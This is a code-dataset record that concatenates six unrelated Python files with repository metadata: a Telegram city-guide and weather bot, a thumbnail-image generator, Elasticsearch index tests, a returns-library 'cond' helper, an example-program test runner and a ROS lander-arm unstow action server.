5e809f6f5b29b93323467c6edb423874635485e0 | 10,769 | py | Python | main.py | kik0908/TelegramBotAPI-Yandex | d3d44bb483a44f2d0c830ad7835ab3eb50dd8ceb | [
"MIT"
] | 5 | 2018-04-07T23:50:50.000Z | 2019-08-22T06:29:43.000Z | main.py | kik0908/TelegramBotAPI-Yandex | d3d44bb483a44f2d0c830ad7835ab3eb50dd8ceb | [
"MIT"
] | 1 | 2018-04-11T18:40:45.000Z | 2018-04-11T18:40:45.000Z | main.py | kik0908/TelegramBotAPI-Yandex | d3d44bb483a44f2d0c830ad7835ab3eb50dd8ceb | [
"MIT"
] | 1 | 2019-11-23T20:34:07.000Z | 2019-11-23T20:34:07.000Z | from random import choice, shuffle
from itertools import cycle
import pymorphy2
from telegram.ext import Updater, MessageHandler, Filters, CallbackQueryHandler, CommandHandler, ConversationHandler
from telegram import ReplyKeyboardMarkup, InlineKeyboardButton, InlineKeyboardMarkup
from geocoder import search, get_ll_span, get_coordinates
from weather_api import get_weather
from settings import TOKEN
# Sphere of interest -> concrete place categories used as geocoder queries.
places = {'спорт': ['стадион', 'дворец спорта', 'тренажёрный зал', 'бассейн'],
          'культура': ['театр', 'музей', 'библиотека', 'дом культуры'],
          'развлечения': ['клуб', 'кино', 'сауна', 'бар', 'караоке', 'квесты', 'боулинг', 'бильярдный зал', 'спортивно-тактические клубы'],
          'медицина': ['больница', 'поликлиника', 'стоматология', 'травмпункт'],
          'медтовары': ['аптека', 'медтовары'],
          'животные': ['Товары для животных', 'ветеренарная клиника'],
          'питание': ['кафе', 'ресторан', 'макдональдс', 'kfc', 'столовая', 'пиццерия', 'суши бар', 'банкетный зал'],
          'религия': ['православный храм', 'мечеть', 'собор'],
          'магазины': ['торговый центр', 'спорттовары', 'магазин одежды', 'детский магазин', 'канцтовары', 'книжный магазин'],
          'автосервис': ['штрафстоянка', 'шиномонтаж', 'заправка', 'автомойка', 'авторемонт', 'стоянка', 'автохимия', 'шины, диски'],
          'туризм': ['гостиница', 'хостел', 'отель', 'база отдыха', 'авиабилеты', 'железнодорожные билеты'],
          'прогулка': ['парк', 'сквер', 'экскурсии', 'достопримечательность', 'отдых'],
          }
# Reply keyboard shown in conversation state 2 (sphere selection).
reply_keyboard = [['Развлечения', 'Питание'],
                  ['Спорт', 'Религия', 'Туризм'],
                  ['Культура', 'Магазины'],
                  ['Автосервис', 'Медтовары', 'Медицина'],
                  ['Животные', 'Прогулка'],
                  ['Погода'],
                  ['Сменить город']]
# Inline keyboards: '1' pages places; '2'/'3' page forecast days forward/back.
inline_keyboard = InlineKeyboardMarkup([[InlineKeyboardButton('Следующее место', callback_data=1)]])
inline_keyboard_1 = InlineKeyboardMarkup([[InlineKeyboardButton('Следующий день', callback_data=2)]])
inline_keyboard_2 = InlineKeyboardMarkup([[InlineKeyboardButton('Следующий день', callback_data=2)],
                                          [InlineKeyboardButton('Предыдущий день', callback_data=3)]])
# Per-message state keyed by message_id:
# location: message_id -> cycle of formatted place texts
# weather: message_id -> [forecast list, current day index]
location = {}
weather = {}
# Morphological analyzer used to agree 'градус' with the temperature number.
morph = pymorphy2.MorphAnalyzer()
def start(bot, update):
    """Handle /start: greet the user and describe the available commands."""
    greeting = ("Привет! :)\n"
                "Я твой бот-помощник!\n")
    guide_help = ("Я помогу тебе найти интересные места в городе на основе твоих интересов, а также узнать погоду.\n"
                  "Для этого напиши /guide\n"
                  "Для прекращения поиска набери /stop\n")
    traffic_help = ("Если захочешь узнать про пробки, то набери\n"
                    "/traffic_congestion {АДРЕС1}:{АДРЕС2}\n"
                    "или\n"
                    "/traffic_congestion {АДРЕС}\n")
    send = update.message.reply_text
    for text in (greeting, guide_help, traffic_help):
        send(text)
def guide(bot, update):
    """/guide entry point: ask which city the user cares about, go to state 1."""
    ask = update.message.reply_text
    ask("Какой город тебя интересует?")
    return 1
def town(bot, update, user_data):
    """State 1: remember the chosen city and validate it with a probe search.

    On success, show the sphere keyboard and go to state 2; otherwise ask
    for the city again (stay in state 1).
    """
    user_data['locality'] = update.message.text
    probe = search(user_data["locality"], 'кино')
    if probe:
        markup = ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
        update.message.reply_text("Выберите сферу которая вас интересует", reply_markup=markup)
        return 2
    print('Ошибка при поиске города')
    update.message.reply_text("Прости, но я не смог найти такой город.\nКакой город тебя интересует?")
    return 1
def stop(bot, update):
    """/stop fallback: say goodbye and end the conversation."""
    farewell = "Удачи!"
    update.message.reply_text(farewell)
    return ConversationHandler.END
def interests(bot, update, user_data):
    """State 2: dispatch on the user's keyboard choice.

    Three cases: switch city (back to state 1), show the weather forecast,
    or search places for one of the ``places`` spheres.  Returns the next
    conversation state (1 or 2).
    """
    message = update.message.text.lower()
    if message == 'сменить город':
        return 1
    elif message == 'погода':
        # Show today's forecast and remember (forecast, day index) keyed by
        # the sent message id so change_places() can page through days.
        _weather = get_weather(user_data['locality'])
        gr = morph.parse('градус')[0]
        degrise = str(_weather[0]['temp']) + ' ' + gr.make_agree_with_number(abs(int(_weather[0]['temp']))).word
        degrise1 = str(_weather[0]['feels_like']) + ' ' + gr.make_agree_with_number(
            abs(int(_weather[0]['feels_like']))).word
        date = _weather[0]['date']
        osh = _weather[0]['condition']
        mes = "Погода на {}.\nТемпература {}(ощущается как {}), {}".format(date, degrise, degrise1, osh)
        _1 = update.message.reply_text(mes, reply_markup=inline_keyboard_1)
        weather[_1.message_id] = [_weather, 0]
        return 2
    elif message in places:
        update.message.reply_text("Начинаю поиск...")
        results_per_query = 8  # choice(range(3, len(places[message]+1)))
        datas = []
        _text = []
        random_places = []
        for _ in range(len(places[message]), 0, -1):
            # Pick a place category not used yet for this search.
            random_place = choice(places[message])
            while random_place in random_places:
                random_place = choice(places[message])
            # BUG FIX: the chosen category was never recorded, so the dedup
            # loop above was dead and categories could repeat.
            random_places.append(random_place)
            result = search(user_data['locality'], random_place, results_per_query)
            for found in result:
                data = found[0]
                coord = found[1]
                if data not in datas:
                    static_api_request = "http://static-maps.yandex.ru/1.x/?ll={}&l=map&z=15&pt={},pm2blywm1".format(
                        coord, coord)
                    _text.append('[Картинка.]({})\n{} ({})'.format(static_api_request, data, random_place))
                    datas.append(data)
        markup = ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
        if not _text:
            # Robustness: nothing found — avoid crashing on next(cycle([])).
            update.message.reply_text("Выберите сферу которая вас интересует", reply_markup=markup)
            return 2
        shuffle(_text)
        _text = cycle(_text)
        # BUG FIX: parse_mode='markdown' so the [Картинка.](url) link renders,
        # matching the edit_message_text calls used for paging.
        _return = update.message.reply_text(next(_text), parse_mode='markdown',
                                            reply_markup=inline_keyboard)
        location[_return.message_id] = _text
        update.message.reply_text("Выберите сферу которая вас интересует", reply_markup=markup)
        return 2
    else:
        return 2
def _forecast_text(day):
    """Render one forecast day (dict with temp/feels_like/date/condition)
    as the user-facing weather message."""
    gr = morph.parse('градус')[0]
    degrise = str(day['temp']) + ' ' + gr.make_agree_with_number(abs(int(day['temp']))).word
    degrise1 = str(day['feels_like']) + ' ' + gr.make_agree_with_number(
        abs(int(day['feels_like']))).word
    date_parts = day['date'].split('-')
    if len(date_parts) != 1:
        # 'YYYY-MM-DD' -> 'DD.MM'
        date = date_parts[-1] + '.' + date_parts[-2]
    else:
        date = day['date']
    return "Погода на {}.\nТемпература {} (ощущается как {}), {}".format(
        date, degrise, degrise1, day['condition'])


def change_places(bot, update):
    """Inline-button callback: '1' pages to the next found place,
    '2'/'3' page the stored forecast forward/backward one day.

    The '2' and '3' branches previously duplicated ~20 lines of rendering
    (with inconsistent spacing in the message); unified via _forecast_text.
    """
    query = update.callback_query
    message_id = query.message.message_id
    if query.data == '1':
        # Advance the place cycle stored by interests().
        bot.edit_message_text(text=next(location[message_id]),
                              chat_id=query.message.chat_id,
                              message_id=message_id, parse_mode='markdown',
                              reply_markup=inline_keyboard)
    elif query.data in ('2', '3'):
        entry = weather[message_id]  # [forecast list, current day index]
        key_board = inline_keyboard_2
        if query.data == '2':
            entry[1] += 1
            if entry[1] >= len(entry[0]):
                # Past the last day: wrap to today and hide 'previous'.
                entry[1] = 0
                key_board = inline_keyboard_1
        else:
            entry[1] -= 1
            if entry[1] <= 0:
                # Back at today: hide 'previous'.
                entry[1] = 0
                key_board = inline_keyboard_1
        bot.edit_message_text(text=_forecast_text(entry[0][entry[1]]),
                              chat_id=query.message.chat_id,
                              message_id=message_id, parse_mode='markdown',
                              reply_markup=key_board)
    return 2
def traffic_congestion(bot, update, args):
    """/traffic_congestion handler: send a static traffic map.

    Accepts either a single address or 'ADDRESS1:ADDRESS2' (map framed to
    show both).  ``args`` is the whitespace-split command argument list.
    """
    if not args:
        update.message.reply_text("Нет адреса")
        return
    if any(':' in part for part in args):
        # Two addresses separated by ':'.
        address = (''.join(args)).split(':')
        address1, address2 = address[0], address[1]
        try:
            lat, lon = get_coordinates(address2)
            ll, spn = get_ll_span(address1, [str(lat) + ',' + str(lon)], [address2])
        except Exception:
            # BUG FIX: previously execution fell through after this reply and
            # hit a NameError on the undefined `ll`/`spn` below.
            update.message.reply_text("Извини, но я не смог найти этот адрес :(")
            return
    else:
        address1 = args
        try:
            ll, spn = get_ll_span(address1, [], [])
        except Exception:
            update.message.reply_text("Извини, но я не смог найти этот адрес :(")
            return
    static_api_request = "http://static-maps.yandex.ru/1.x/?ll={}&l=map,trf&spn={}".format(ll, spn)
    bot.sendPhoto(
        update.message.chat.id,
        static_api_request
    )
def main():
    """Wire up all handlers and run the bot until interrupted."""
    updater = Updater(TOKEN)
    dispatcher = updater.dispatcher
    # Conversation: /guide -> state 1 (city) -> state 2 (interests/paging).
    conversation_states = {
        1: [MessageHandler(Filters.text, town, pass_user_data=True)],
        2: [MessageHandler(Filters.text, interests, pass_user_data=True),
            CallbackQueryHandler(change_places)],
    }
    conversation = ConversationHandler(
        entry_points=[CommandHandler('guide', guide)],
        states=conversation_states,
        fallbacks=[CommandHandler('stop', stop)],
    )
    handlers = (
        conversation,
        CommandHandler('start', start),
        CommandHandler('traffic_congestion', traffic_congestion, pass_args=True),
    )
    for handler in handlers:
        dispatcher.add_handler(handler)
    updater.start_polling()
    updater.idle()
# Start the bot only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| 39.885185 | 139 | 0.594391 | 1,170 | 10,769 | 5.276923 | 0.270085 | 0.029155 | 0.046161 | 0.05102 | 0.427276 | 0.391642 | 0.364917 | 0.343537 | 0.319242 | 0.312763 | 0 | 0.011732 | 0.263906 | 10,769 | 269 | 140 | 40.033457 | 0.767125 | 0.011143 | 0 | 0.325123 | 0 | 0.009852 | 0.196148 | 0.003946 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039409 | false | 0.014778 | 0.039409 | 0 | 0.123153 | 0.004926 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8562b359ddfac56302ad4265ef21d77fb3b401 | 4,804 | py | Python | make_thumbnails.py | ceesem/text_image_thumbnails | 79d6739861547b26d6c845d3d9f2c27c5709a5e6 | [
"MIT"
] | null | null | null | make_thumbnails.py | ceesem/text_image_thumbnails | 79d6739861547b26d6c845d3d9f2c27c5709a5e6 | [
"MIT"
] | null | null | null | make_thumbnails.py | ceesem/text_image_thumbnails | 79d6739861547b26d6c845d3d9f2c27c5709a5e6 | [
"MIT"
] | null | null | null | from src.thumbnail_maker import thumbnail_image, simple_filename, make_author_string
import pandas as pd
import click
import datetime
import os
import tqdm
import re
import time
from multiwrapper import multiprocessing_utils as mu
# Default CSV column names / name prefixes looked up in the input file.
TITLE_COLUMN = "title"
ABSTRACT_COLUMN = "abstract"
AUTHOR_COLUMN_CONTAINS = "author"
TWITTER_COLUMN_CONTAINS = "twitter"
# Default output directory and image geometry (pixels).
THUMBNAIL_DIRECTORY = "thumbnail_images"
MIN_HEIGHT = 570
WIDTH = 1000
@click.command()
@click.option("--filename", "-f")
@click.option("--batch_name", "-b", default=None)
@click.option("--min_height", "-h", default=MIN_HEIGHT)
@click.option("--width", "-w", default=WIDTH)
@click.option("--title_column", "-T", default=TITLE_COLUMN)
@click.option("--abstract_column", "-A", default=ABSTRACT_COLUMN)
@click.option("--author_column_contains", "-au", default=AUTHOR_COLUMN_CONTAINS)
@click.option("--twitter_column_contains", "-tw", default=TWITTER_COLUMN_CONTAINS)
@click.option("--save_author_string", "-s", default=True)
@click.option("--thumbnail_directory", "-d", default=THUMBNAIL_DIRECTORY)
@click.option("--use_oxford", "-ox", default=False)
@click.option("--n_threads", "-n", default=2)
def generate_thumbnails(
    filename,
    batch_name,
    min_height,
    width,
    title_column,
    abstract_column,
    author_column_contains,
    twitter_column_contains,
    save_author_string,
    thumbnail_directory,
    use_oxford,
    n_threads,
):
    """Generate one thumbnail image per row of the input CSV.

    The CSV must contain title and abstract columns plus one or more author
    (and optionally twitter-handle) columns whose names match the given
    prefixes.  Images go to ``thumbnail_directory/<batch>/``; when
    ``save_author_string`` is true the CSV is re-saved there with an extra
    ``authors_with_handles`` column.
    """
    data = pd.read_csv(filename)

    # Columns whose names match the author / twitter prefix patterns.
    author_columns = [c for c in data.columns
                      if re.match(author_column_contains, c) is not None]
    twitter_columns = []
    if twitter_column_contains is not False:
        twitter_columns = [c for c in data.columns
                           if re.match(twitter_column_contains, c) is not None]

    author_list = []
    author_list_with_handles = []
    for ii, row in data[author_columns].iterrows():
        auths = row[~pd.isna(row)].tolist()
        author_list.append(make_author_string(auths, use_oxford=use_oxford))
        try:
            twit_row = data.iloc[ii][twitter_columns]
            # NOTE(review): handles are masked by the *author* row's NaNs so
            # the handle list stays parallel to the author list — confirm this
            # is intended when author and twitter columns can differ per row.
            handles = twit_row[~pd.isna(row).values].tolist()
            author_list_with_handles.append(
                make_author_string(auths, twitter_list=handles, use_oxford=use_oxford)
            )
        except Exception:
            # Was a bare `except:`; keep the original best-effort fallback of
            # using the plain author strings, but stop swallowing SystemExit etc.
            print("Twitter handles failed!")
            author_list_with_handles = author_list

    title_list = data[title_column].tolist()
    abstract_list = data[abstract_column].tolist()

    if batch_name is None:
        batch_dir = f"batch_{str(datetime.date.today()).replace('-', '_')}"
    else:
        batch_dir = batch_name
    # makedirs creates both directory levels and is race-free
    # (replaces the previous two exists()+mkdir() steps).
    os.makedirs(f"{thumbnail_directory}/{batch_dir}", exist_ok=True)

    if n_threads > 1:
        print(f"Making all images with {n_threads} processes...")
        t0 = time.time()
        all_args = [
            [title, authors, abstract, width, min_height,
             thumbnail_directory, batch_dir]
            for title, authors, abstract in zip(title_list, author_list, abstract_list)
        ]
        mu.multiprocess_func(_save_data_multithreaded, all_args, n_threads=n_threads)
        print(f"\tImages produced in {time.time()-t0:.2f} s.")
    else:
        for title, authors, abstract in tqdm.tqdm(
            zip(title_list, author_list, abstract_list), total=len(title_list)
        ):
            img = thumbnail_image(
                title, authors, abstract, image_width=width, min_height=min_height
            )
            fname = simple_filename(
                title, f"{thumbnail_directory}/{batch_dir}", max_words=8
            )
            img.save(
                fname, dpi=(150, 150),
            )

    if save_author_string:
        data["authors_with_handles"] = author_list_with_handles
        pure_filename = os.path.split(filename)[-1]
        fn = pure_filename.split(".")
        out_name = f"{thumbnail_directory}/{batch_dir}/{fn[-2].replace('/','')}_with_tweets.csv"
        data.to_csv(out_name)
        print(f"Data saved to {out_name}")
    return
def _save_data_multithreaded(data):
    """Worker for multiprocess thumbnail generation.

    ``data`` packs one job's arguments:
    (title, authors, abstract, width, min_height, thumbnail_directory, batch_dir).
    """
    (title, authors, abstract, width, min_height,
     thumbnail_directory, batch_dir) = data
    image = thumbnail_image(
        title, authors, abstract, image_width=width, min_height=min_height
    )
    out_path = simple_filename(title, f"{thumbnail_directory}/{batch_dir}", max_words=8)
    image.save(
        out_path, dpi=(150, 150),
    )
# CLI entry point guard (click parses sys.argv).
if __name__ == "__main__":
    generate_thumbnails()
| 33.361111 | 96 | 0.640716 | 582 | 4,804 | 4.994845 | 0.228522 | 0.080495 | 0.055384 | 0.062608 | 0.27967 | 0.204334 | 0.187823 | 0.164431 | 0.146543 | 0.146543 | 0 | 0.007675 | 0.240633 | 4,804 | 143 | 97 | 33.594406 | 0.7892 | 0 | 0 | 0.15748 | 0 | 0 | 0.141341 | 0.067027 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015748 | false | 0 | 0.070866 | 0 | 0.094488 | 0.031496 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e863cabfcc78adbadb9b8afecff13f3686d8348 | 681 | py | Python | regcore/tests/index_tests.py | cfpb/regulations-core | bb73956ab10d175fa19051573e3a279956c36bf9 | [
"CC0-1.0"
] | 8 | 2015-04-22T17:48:22.000Z | 2019-08-17T06:14:23.000Z | regcore/tests/index_tests.py | DalavanCloud/regulations-core | bb73956ab10d175fa19051573e3a279956c36bf9 | [
"CC0-1.0"
] | 27 | 2015-06-02T15:40:23.000Z | 2018-07-31T14:50:57.000Z | regcore/tests/index_tests.py | DalavanCloud/regulations-core | bb73956ab10d175fa19051573e3a279956c36bf9 | [
"CC0-1.0"
] | 39 | 2015-01-26T16:24:40.000Z | 2021-02-20T10:51:13.000Z | from regcore.index import *
from mock import patch
from pyelasticsearch.exceptions import IndexAlreadyExistsError
from unittest import TestCase
class IndexTest(TestCase):
    """Tests for init_schema()'s interaction with the ElasticSearch client."""

    @patch('regcore.index.ElasticSearch')
    def test_init_schema(self, es_cls):
        """A fresh index is created and its mapping installed."""
        init_schema()
        client = es_cls.return_value
        self.assertTrue(es_cls.called)
        self.assertTrue(client.create_index.called)
        self.assertTrue(client.put_mapping.called)

    @patch('regcore.index.ElasticSearch')
    def test_init_schema_index_exists(self, es_cls):
        """An already-existing index is tolerated; the mapping is still put."""
        client = es_cls.return_value
        client.create_index.side_effect = IndexAlreadyExistsError()
        init_schema()
        self.assertTrue(client.put_mapping.called)
| 32.428571 | 76 | 0.748899 | 82 | 681 | 6.012195 | 0.365854 | 0.081136 | 0.129817 | 0.133874 | 0.588235 | 0.444219 | 0.365112 | 0.365112 | 0 | 0 | 0 | 0 | 0.162996 | 681 | 20 | 77 | 34.05 | 0.864912 | 0 | 0 | 0.375 | 0 | 0 | 0.079295 | 0.079295 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e886667e495d30bf864d224193f954c5d8267bd | 1,145 | py | Python | returns/pointfree/cond.py | thecoblack/returns | ad76d4c5282ce53213cad57dc550e5b4565e2b48 | [
"BSD-2-Clause"
] | null | null | null | returns/pointfree/cond.py | thecoblack/returns | ad76d4c5282ce53213cad57dc550e5b4565e2b48 | [
"BSD-2-Clause"
] | null | null | null | returns/pointfree/cond.py | thecoblack/returns | ad76d4c5282ce53213cad57dc550e5b4565e2b48 | [
"BSD-2-Clause"
] | null | null | null | from typing import Callable, Type, TypeVar
from returns.interfaces.specific.result import ResultLikeN
from returns.methods.cond import internal_cond
from returns.primitives.hkt import Kind2, Kinded, kinded
# Success / failure payload types, plus the concrete Result-like container kind.
_ValueType = TypeVar('_ValueType')
_ErrorType = TypeVar('_ErrorType')
_ResultKind = TypeVar('_ResultKind', bound=ResultLikeN)
def cond(
    container_type: Type[_ResultKind],
    success_value: _ValueType,
    error_value: _ErrorType,
) -> Kinded[Callable[[bool], Kind2[_ResultKind, _ValueType, _ErrorType]]]:
    """
    Reduce the boilerplate of choosing a ``ResultLikeN`` branch from a bool.

    .. code:: python

      >>> from returns.pointfree import cond
      >>> from returns.result import Failure, Result, Success

      >>> assert cond(Result, 'success', 'failure')(True) == Success('success')
      >>> assert cond(Result, 'success', 'failure')(False) == Failure('failure')

    """
    @kinded
    def decide(
        is_success: bool,
    ) -> Kind2[_ResultKind, _ValueType, _ErrorType]:
        # Delegate to the shared method implementation in returns.methods.cond.
        return internal_cond(
            container_type, is_success, success_value, error_value,
        )
    return decide
| 30.131579 | 80 | 0.69345 | 122 | 1,145 | 6.303279 | 0.393443 | 0.071521 | 0.039012 | 0.072822 | 0.192458 | 0.096229 | 0 | 0 | 0 | 0 | 0 | 0.003236 | 0.190393 | 1,145 | 37 | 81 | 30.945946 | 0.826321 | 0.303057 | 0 | 0 | 0 | 0 | 0.040736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0.05 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e88d2b6f941cc8b5054e654c852f3aeea9d95eb | 2,111 | py | Python | concat/tests/test_example_programs.py | jmanuel1/concat | b8a982f0b07c4af4a8d30c8fab927a07a4068232 | [
"MIT"
] | 5 | 2020-11-27T23:34:29.000Z | 2022-03-08T16:37:19.000Z | concat/tests/test_example_programs.py | jmanuel1/concat | b8a982f0b07c4af4a8d30c8fab927a07a4068232 | [
"MIT"
] | 1 | 2020-06-03T22:43:36.000Z | 2020-06-03T22:45:42.000Z | concat/tests/test_example_programs.py | jmanuel1/concat | b8a982f0b07c4af4a8d30c8fab927a07a4068232 | [
"MIT"
"""
Example tests: make sure all examples work.

NOTE: This must be run from project root!
"""
from scripttest import TestFileEnvironment  # type: ignore
import unittest
import os
import sys
import os.path

# Scripttest sandbox rooted at ./test-output, commands run from the repo root.
env = TestFileEnvironment('./test-output', cwd='.')
example_dir = './concat/examples'
# Every *.cat file under the examples directory is treated as a test case.
examples = [
    os.path.join(example_dir, x)
    for x in os.listdir(example_dir)
    if x.endswith('.cat')
]
class TestExamplePrograms(unittest.TestCase):
    """Test all the examples in concat/examples for correctness."""

    def test_examples(self):
        """Test each example.

        Ignored files must begin with '# IGNORE'.
        Tested files each must start with '# IN: ' followed by the standard
        input as a string literal, a newline, and '# OUT: ' followed by the
        expected standard output.
        """
        import ast  # local: only needed to parse the spec literals below
        for name in examples:
            with open(name) as spec, self.subTest(example=name):
                inp = spec.readline()
                # Ignore the file?
                if inp.startswith('# IGNORE'):
                    continue
                in_start, out_start = '# IN: ', '# OUT:'
                if not inp.startswith(in_start):
                    raise Exception(
                        'No input specified for file {}'.format(name)
                    )
                # The spec is documented as a string literal, so
                # ast.literal_eval is sufficient — and safer than eval().
                inp = ast.literal_eval(inp[len(in_start) :].strip())
                out = spec.readline()
                if not out.startswith(out_start):
                    raise Exception(
                        'No output specified for file {}'.format(name)
                    )
                out = ast.literal_eval(out[len(out_start) :].strip())
                # scripttest fails loudly if concat exits with a nonzero code
                actual = env.run(
                    sys.executable,
                    '-m',
                    'coverage',
                    'run',
                    '-m',
                    'concat',
                    name,
                    stdin=inp.encode(),
                    expect_stderr=True,
                )
                self.assertEqual(actual.stdout, out)
| 31.507463 | 77 | 0.509237 | 218 | 2,111 | 4.880734 | 0.449541 | 0.028195 | 0.024436 | 0.039474 | 0.048872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.392231 | 2,111 | 66 | 78 | 31.984848 | 0.829306 | 0.217906 | 0 | 0.093023 | 0 | 0 | 0.086164 | 0 | 0 | 0 | 0 | 0 | 0.023256 | 1 | 0.023256 | false | 0 | 0.116279 | 0 | 0.162791 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e893fcabfae32e0fe9170e0a077a7d484a9f030 | 3,988 | py | Python | ow_lander/scripts/unstow_action_server.py | nasa/ow_simulator | 662fea6bf83d82e1b0aac69d05c16dee77cd71a5 | [
"NASA-1.3"
] | 97 | 2020-08-10T08:43:14.000Z | 2022-03-21T21:14:15.000Z | ow_lander/scripts/unstow_action_server.py | AliMuhammadOfficial/ow_simulator | e0c96d74c1f3dea1451c90782172a10cfe183d94 | [
"NASA-1.3"
] | 153 | 2020-08-11T22:37:25.000Z | 2022-03-31T23:29:41.000Z | ow_lander/scripts/unstow_action_server.py | AliMuhammadOfficial/ow_simulator | e0c96d74c1f3dea1451c90782172a10cfe183d94 | [
"NASA-1.3"
] | 26 | 2020-08-06T17:07:03.000Z | 2022-03-16T01:04:01.000Z | #!/usr/bin/env python2
# The Notices and Disclaimers for Ocean Worlds Autonomy Testbed for Exploration
# Research and Simulation can be found in README.md in the root directory of
# this repository.
import rospy
import actionlib
import ow_lander.msg
import sys
import copy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from std_msgs.msg import String
from sensor_msgs.msg import JointState
from gazebo_msgs.msg import LinkStates
from moveit_commander.conversions import pose_to_list
import constants
import utils
from LanderInterface import MoveItInterface
from LanderInterface import LinkStateSubscriber
from trajectory_async_execution import TrajectoryAsyncExecuter
class UnstowActionServer(object):
    """SimpleActionServer that drives the lander arm to the named
    'arm_unstowed' MoveIt target, publishing the lander-link position
    as action feedback while the trajectory executes."""

    def __init__(self,name):
        self._action_name = name
        self._server = actionlib.SimpleActionServer(self._action_name,
                                                    ow_lander.msg.UnstowAction,
                                                    execute_cb=self.on_unstow_action,
                                                    auto_start = False)
        self._server.start()
        # Action Feedback/Result
        self._fdbk = ow_lander.msg.UnstowFeedback()
        self._result = ow_lander.msg.UnstowResult()
        self._current_link_state = LinkStateSubscriber()
        self._interface = MoveItInterface()
        # Set per-goal in _update_motion() from the planned trajectory duration.
        self._timeout = 0.0
        self.trajectory_async_executer = TrajectoryAsyncExecuter()
        self.trajectory_async_executer.connect("arm_controller")

    def _update_feedback(self):
        # Publish the most recently observed link position as feedback.
        self._ls = self._current_link_state._link_value
        self._fdbk.current.x = self._ls.x
        self._fdbk.current.y = self._ls.y
        self._fdbk.current.z = self._ls.z
        self._server.publish_feedback(self._fdbk)

    def _update_motion(self):
        # Plan a trajectory to the 'arm_unstowed' named target.
        # Returns the plan, or None when planning produced no points.
        print("Unstow arm activity started")
        # NOTE(review): this first assignment is immediately overwritten by
        # the named-target lookup below — likely leftover code.
        goal = self._interface.move_arm.get_current_pose().pose
        goal = self._interface.move_arm.get_named_target_values("arm_unstowed")
        plan = self._interface.move_arm.plan(goal)
        if len(plan.joint_trajectory.points) < 1:
            return
        else:
            n_points = len(plan.joint_trajectory.points)
            start_time = plan.joint_trajectory.points[0].time_from_start
            end_time = plan.joint_trajectory.points[n_points-1].time_from_start
            # Cache the planned duration; used as the feedback-loop timeout.
            self._timeout = end_time -start_time
        return plan

    def on_unstow_action(self,goal):
        # Execute callback: plan, start async execution, publish feedback
        # until the planned duration elapses, then report success/failure.
        plan = self._update_motion()
        if plan is None:
            self._server.set_aborted(self._result)
            return
        success = False
        self.trajectory_async_executer.execute(plan.joint_trajectory,
                                               done_cb=None,
                                               active_cb=None,
                                               feedback_cb=self.trajectory_async_executer.stop_arm_if_fault)
        # Record start time
        start_time = rospy.get_time()

        def now_from_start(start):
            # Elapsed wall time as a rospy.Duration (comparable to _timeout).
            #return rospy.get_time() - start
            return rospy.Duration(secs=rospy.get_time() - start)

        # NOTE(review): busy-wait feedback loop — spins at full speed with no
        # rospy.sleep between iterations; confirm this is intended.
        while ((now_from_start(start_time) < self._timeout)):
            self._update_feedback()
        success = self.trajectory_async_executer.success() and self.trajectory_async_executer.wait()
        if success:
            self._result.final.x = self._fdbk.current.x
            self._result.final.y = self._fdbk.current.y
            self._result.final.z = self._fdbk.current.z
            rospy.loginfo('%s: Succeeded' % self._action_name)
            self._server.set_succeeded(self._result)
        else:
            rospy.loginfo('%s: Failed' % self._action_name)
            self._server.set_aborted(self._result)
# ROS node entry point: register the action server and spin until shutdown.
if __name__ == '__main__':
    rospy.init_node('Unstow')
    server = UnstowActionServer(rospy.get_name())
    rospy.spin()
| 34.982456 | 108 | 0.634654 | 455 | 3,988 | 5.23956 | 0.316484 | 0.026846 | 0.047819 | 0.067953 | 0.146393 | 0.065017 | 0 | 0 | 0 | 0 | 0 | 0.002116 | 0.288867 | 3,988 | 113 | 109 | 35.292035 | 0.838505 | 0.065948 | 0 | 0.075 | 0 | 0 | 0.024207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.2125 | 0.0125 | 0.3375 | 0.0125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
